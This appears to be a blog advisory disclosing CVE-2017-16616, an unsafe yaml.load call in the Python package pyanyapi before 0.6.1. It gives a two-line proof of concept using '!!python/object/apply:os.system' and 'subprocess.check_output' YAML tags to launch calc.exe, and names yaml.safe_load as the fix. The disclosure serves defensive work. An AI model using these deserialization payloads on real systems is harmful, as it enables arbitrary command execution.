---
layout: post
title: "CVE-2017-16616-YAMLParser-in-pyanyapi"
date: 2017-11-08 17:30:12 +0800
comments: true
categories: vulnerability
---


<font size="4">**Python Package:**　　[pyanyapi](https://pypi.python.org/pypi/pyanyapi/)  </font>
 
<font size="4"> **Version:**　　　　　 Before 0.6.1  </font>

<font size="4"> **Published:**　　　　Nov. 7th. 2017  </font>

<font size="4"> **Reported by:** 　　　　　 Joel  </font>

<font size="4"> **CVE-2017-16616**   </font>


## Overview 

`Pyanyapi` is a Library for for convenient interface creation over various types of data in a declarative way. An issue was discovered in the `pyanapi` package before `0.6.1`.Untrusted data passed into the `yaml.load()` function can execute arbitrary python commands resulting in command execution.


## POC

```
from pyanyapi import YAMLParser
YAMLParser({'test': 'container > test'}).parse('!!python/object/apply:os.system ["calc.exe"]').test
YAMLParser({'test': 'container > test'}).parse('!!python/object/new:subprocess.check_output [["calc.exe"]]').test
```
##### Poc Video

<center><iframe width="560" height="315" src="https://www.youtube.com/embed/D15TTC7AWG4" frameborder="0" gesture="media" allowfullscreen></iframe></center>

## Remediation

The updated versions of `pyanapi (0.6.1)` correctly use the `yaml.safe_load` method which prevents remote code execution.
